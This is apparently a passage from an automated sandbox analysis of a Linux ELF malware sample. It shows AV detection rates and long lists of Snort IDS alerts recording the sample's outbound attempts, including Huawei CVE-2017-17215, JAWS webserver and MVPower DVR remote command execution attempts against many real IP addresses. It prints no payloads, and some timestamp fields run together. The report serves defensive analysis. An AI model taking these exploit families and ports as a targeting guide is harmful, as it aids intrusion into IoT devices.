              Source Port:48702
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23208.109.68.2335052802025883 01/02/24-06:25:09.832341
              SID:2025883
              Source Port:35052
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2352.204.79.20242440802025883 01/02/24-06:25:11.888955
              SID:2025883
              Source Port:42440
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2335.183.50.13935316802025883 01/02/24-06:25:42.350384
              SID:2025883
              Source Port:35316
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23104.97.11.2460650802025883 01/02/24-06:25:22.089353
              SID:2025883
              Source Port:60650
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23121.11.37.23456696802025883 01/02/24-06:24:50.251380
              SID:2025883
              Source Port:56696
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2352.1.227.24732976802030092 01/02/24-06:25:31.234449
              SID:2030092
              Source Port:32976
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23103.141.149.9046528802030092 01/02/24-06:24:19.516603
              SID:2030092
              Source Port:46528
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23185.204.186.16245770802025883 01/02/24-06:24:24.014425
              SID:2025883
              Source Port:45770
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23201.192.158.13039898802030092 01/02/24-06:25:34.727412
              SID:2030092
              Source Port:39898
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2390.79.11.6051570802030092 01/02/24-06:25:21.019509
              SID:2030092
              Source Port:51570
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23207.60.214.5343892802025883 01/02/24-06:23:58.146252
              SID:2025883
              Source Port:43892
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23173.255.250.6148452802025883 01/02/24-06:24:17.602391
              SID:2025883
              Source Port:48452
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2334.206.169.21634808802030092 01/02/24-06:25:00.915047
              SID:2030092
              Source Port:34808
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.232.21.224.12652276802025883 01/02/24-06:25:16.010358
              SID:2025883
              Source Port:52276
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2352.68.208.13645118802030092 01/02/24-06:25:29.707548
              SID:2030092
              Source Port:45118
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2313.236.88.18038176802025883 01/02/24-06:25:14.749773
              SID:2025883
              Source Port:38176
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2313.127.14.18542886802025883 01/02/24-06:24:41.189472
              SID:2025883
              Source Port:42886
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23143.208.250.1143668802025883 01/02/24-06:25:10.207227
              SID:2025883
              Source Port:43668
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2385.50.165.3759160802025883 01/02/24-06:24:24.106651
              SID:2025883
              Source Port:59160
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23146.75.21.14359376802030092 01/02/24-06:24:45.316760
              SID:2030092
              Source Port:59376
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2313.249.87.5444040802025883 01/02/24-06:24:23.621355
              SID:2025883
              Source Port:44040
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23198.44.232.13837024802030092 01/02/24-06:25:43.163000
              SID:2030092
              Source Port:37024
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23202.81.229.16957854802030092 01/02/24-06:24:05.844790
              SID:2030092
              Source Port:57854
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23104.93.2.11952484802030092 01/02/24-06:24:52.173461
              SID:2030092
              Source Port:52484
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2338.181.35.21934152802025883 01/02/24-06:23:55.217292
              SID:2025883
              Source Port:34152
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23205.164.12.22246902802030092 01/02/24-06:24:20.042564
              SID:2030092
              Source Port:46902
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2343.139.38.17550990802030092 01/02/24-06:24:04.154188
              SID:2030092
              Source Port:50990
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23103.21.117.2251812802030092 01/02/24-06:25:22.210601
              SID:2030092
              Source Port:51812
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23208.109.173.19843616802025883 01/02/24-06:25:34.668261
              SID:2025883
              Source Port:43616
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23172.98.133.4651318802025883 01/02/24-06:25:21.231178
              SID:2025883
              Source Port:51318
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2334.233.79.10139524802025883 01/02/24-06:24:40.913375
              SID:2025883
              Source Port:39524
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2399.80.176.12533828802030092 01/02/24-06:25:00.994557
              SID:2030092
              Source Port:33828
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2323.216.114.4945924802030092 01/02/24-06:25:10.067215
              SID:2030092
              Source Port:45924
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2338.132.215.4440936802025883 01/02/24-06:24:13.920460
              SID:2025883
              Source Port:40936
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2352.29.37.5835934802025883 01/02/24-06:25:21.265685
              SID:2025883
              Source Port:35934
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23167.73.14.8833056802030092 01/02/24-06:24:23.650284
              SID:2030092
              Source Port:33056
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23118.99.59.24958056802030092 01/02/24-06:24:31.063069
              SID:2030092
              Source Port:58056
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23156.234.219.23440728802030092 01/02/24-06:25:19.115031
              SID:2030092
              Source Port:40728
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2352.218.234.14751138802030092 01/02/24-06:25:02.194486
              SID:2030092
              Source Port:51138
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23107.158.48.17360248802030092 01/02/24-06:25:24.657251
              SID:2030092
              Source Port:60248
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23121.4.183.14448996802030092 01/02/24-06:25:19.173099
              SID:2030092
              Source Port:48996
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23197.26.81.356728802025883 01/02/24-06:24:49.038851
              SID:2025883
              Source Port:56728
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2318.169.231.14560782802030092 01/02/24-06:24:54.905175
              SID:2030092
              Source Port:60782
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23185.114.245.25152468802025883 01/02/24-06:25:19.107884
              SID:2025883
              Source Port:52468
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23184.85.129.25155542802030092 01/02/24-06:24:01.334668
              SID:2030092
              Source Port:55542
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2354.199.121.17058798802030092 01/02/24-06:24:19.269485
              SID:2030092
              Source Port:58798
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23104.69.218.3453078802025883 01/02/24-06:24:30.590605
              SID:2025883
              Source Port:53078
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23209.51.136.5541670802025883 01/02/24-06:25:42.872171
              SID:2025883
              Source Port:41670
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2338.239.158.19649628802025883 01/02/24-06:24:03.470698
              SID:2025883
              Source Port:49628
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23202.238.204.21040470802025883 01/02/24-06:24:24.201458
              SID:2025883
              Source Port:40470
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23185.179.157.10256368802030092 01/02/24-06:24:10.926344
              SID:2030092
              Source Port:56368
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2318.208.8.11543682802025883 01/02/24-06:25:15.875600
              SID:2025883
              Source Port:43682
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23168.93.163.14643476802030092 01/02/24-06:24:30.901528
              SID:2030092
              Source Port:43476
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23156.241.14.15348512372152835222 01/02/24-06:23:49.692230
              SID:2835222
              Source Port:48512
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.2394.250.243.644720802025883 01/02/24-06:24:27.687612
              SID:2025883
              Source Port:44720
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2344.237.111.25343424802030092 01/02/24-06:23:59.006301
              SID:2030092
              Source Port:43424
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2337.221.198.8650826802025883 01/02/24-06:25:24.777893
              SID:2025883
              Source Port:50826
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2385.126.165.10351920802030092 01/02/24-06:25:29.714738
              SID:2030092
              Source Port:51920
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2323.50.91.16934304802025883 01/02/24-06:25:25.361156
              SID:2025883
              Source Port:34304
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.23211.253.8.10738410802030092 01/02/24-06:25:02.050528
              SID:2030092
              Source Port:38410
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23121.128.130.643932802030092 01/02/24-06:24:56.157594
              SID:2030092
              Source Port:43932
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23122.219.208.9451858802025883 01/02/24-06:25:29.715016
              SID:2025883
              Source Port:51858
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2334.203.180.1341426802030092 01/02/24-06:24:04.156700
              SID:2030092
              Source Port:41426
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2337.1.204.6437102802025883 01/02/24-06:25:29.908844
              SID:2025883
              Source Port:37102
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2347.90.200.13459390802025883 01/02/24-06:24:08.717627
              SID:2025883
              Source Port:59390
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2371.80.219.1554798802030092 01/02/24-06:24:23.996859
              SID:2030092
              Source Port:54798
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23148.231.244.9739988802030092 01/02/24-06:24:58.640723
              SID:2030092
              Source Port:39988
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23154.38.247.12652462802030092 01/02/24-06:25:06.911219
              SID:2030092
              Source Port:52462
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2323.221.123.6153238802030092 01/02/24-06:25:30.014297
              SID:2030092
              Source Port:53238
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2382.163.53.1537476802025883 01/02/24-06:24:23.976596
              SID:2025883
              Source Port:37476
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2343.192.122.6537710802030092 01/02/24-06:25:42.873893
              SID:2030092
              Source Port:37710
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23172.245.174.8046628802025883 01/02/24-06:24:17.912872
              SID:2025883
              Source Port:46628
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2354.211.17.19052204802030092 01/02/24-06:23:51.955510
              SID:2030092
              Source Port:52204
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2334.160.79.11940184802030092 01/02/24-06:25:43.999253
              SID:2030092
              Source Port:40184
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2338.173.201.9140430802030092 01/02/24-06:24:30.753564
              SID:2030092
              Source Port:40430
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2323.78.13.16036348802025883 01/02/24-06:23:58.964776
              SID:2025883
              Source Port:36348
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2393.241.196.4942544802030092 01/02/24-06:24:43.250963
              SID:2030092
              Source Port:42544
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23185.214.242.16237540802030092 01/02/24-06:24:49.039118
              SID:2030092
              Source Port:37540
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2380.15.65.10050756802030092 01/02/24-06:24:55.923121
              SID:2030092
              Source Port:50756
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.23213.92.76.14950818802030092 01/02/24-06:25:32.164890
              SID:2030092
              Source Port:50818
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2318.133.47.14241080802025883 01/02/24-06:25:11.803956
              SID:2025883
              Source Port:41080
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:192.168.2.2334.107.164.6038972802030092 01/02/24-06:24:27.400912
              SID:2030092
              Source Port:38972
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:192.168.2.2370.121.13.460866802030092 01/02/24-06:24:27.470721
              SID:2030092
              Source Port:60866
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: if33NMq1O2.elfAvira: detected
              Source: if33NMq1O2.elfReversingLabs: Detection: 68%
              Source: if33NMq1O2.elfVirustotal: Detection: 66%Perma Link

              Networking

              barindex
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:34064 -> 156.235.102.230:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:34064 -> 156.235.102.230:37215
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48674 -> 167.172.137.111:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45530 -> 151.101.7.166:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40968 -> 130.211.15.95:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48674 -> 167.172.137.111:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:45530 -> 151.101.7.166:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:40968 -> 130.211.15.95:80
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:48512 -> 156.241.14.153:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:48512 -> 156.241.14.153:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:51712 -> 156.247.18.93:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:51712 -> 156.247.18.93:37215
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56150 -> 113.198.35.222:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38286 -> 101.42.123.60:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40722 -> 184.29.129.7:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:32926 -> 172.121.35.80:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36362 -> 24.236.125.84:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:40722 -> 184.29.129.7:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:32926 -> 172.121.35.80:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:38286 -> 101.42.123.60:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:36362 -> 24.236.125.84:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42508 -> 94.253.89.24:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38636 -> 89.218.57.128:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59224 -> 91.215.216.43:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:42508 -> 94.253.89.24:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:38636 -> 89.218.57.128:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:59224 -> 91.215.216.43:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60502 -> 67.212.162.83:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42464 -> 63.195.193.240:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60550 -> 104.107.28.16:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60502 -> 67.212.162.83:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33832 -> 66.22.55.129:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55228 -> 220.134.218.248:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53040 -> 38.55.173.244:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:42464 -> 63.195.193.240:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36382 -> 173.61.119.77:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60550 -> 104.107.28.16:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60990 -> 159.69.20.60:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48094 -> 5.133.222.136:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33832 -> 66.22.55.129:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:53040 -> 38.55.173.244:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:36382 -> 173.61.119.77:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46956 -> 160.121.60.205:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55228 -> 220.134.218.248:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60990 -> 159.69.20.60:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48094 -> 5.133.222.136:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52204 -> 54.211.17.190:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54666 -> 104.81.147.86:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:32814 -> 149.57.79.102:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45040 -> 108.186.216.181:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55198 -> 67.207.70.100:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60376 -> 116.203.70.28:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:46956 -> 160.121.60.205:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39152 -> 185.124.143.188:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:52204 -> 54.211.17.190:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:54666 -> 104.81.147.86:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:32814 -> 149.57.79.102:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:45040 -> 108.186.216.181:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55198 -> 67.207.70.100:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60376 -> 116.203.70.28:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:39152 -> 185.124.143.188:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48022 -> 125.229.151.239:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34120 -> 38.181.35.219:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45054 -> 18.155.199.105:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51226 -> 108.186.100.209:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38734 -> 185.164.6.48:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48022 -> 125.229.151.239:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:34120 -> 38.181.35.219:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:45054 -> 18.155.199.105:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:51226 -> 108.186.100.209:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44810 -> 190.167.115.162:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49624 -> 104.82.113.61:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58400 -> 119.77.165.60:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52912 -> 146.75.63.133:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:38734 -> 185.164.6.48:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34152 -> 38.181.35.219:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:44810 -> 190.167.115.162:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:49624 -> 104.82.113.61:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47442 -> 121.36.115.249:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:52912 -> 146.75.63.133:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55520 -> 23.194.37.217:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58400 -> 119.77.165.60:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:34152 -> 38.181.35.219:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53294 -> 4.152.153.164:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38386 -> 142.58.163.96:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58414 -> 109.196.234.18:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:53294 -> 4.152.153.164:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:47442 -> 121.36.115.249:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55520 -> 23.194.37.217:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58414 -> 109.196.234.18:80
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:37532 -> 156.254.98.90:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:37532 -> 156.254.98.90:37215
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45826 -> 20.47.19.114:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45120 -> 109.168.109.229:80
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:40630 -> 156.235.97.230:37215
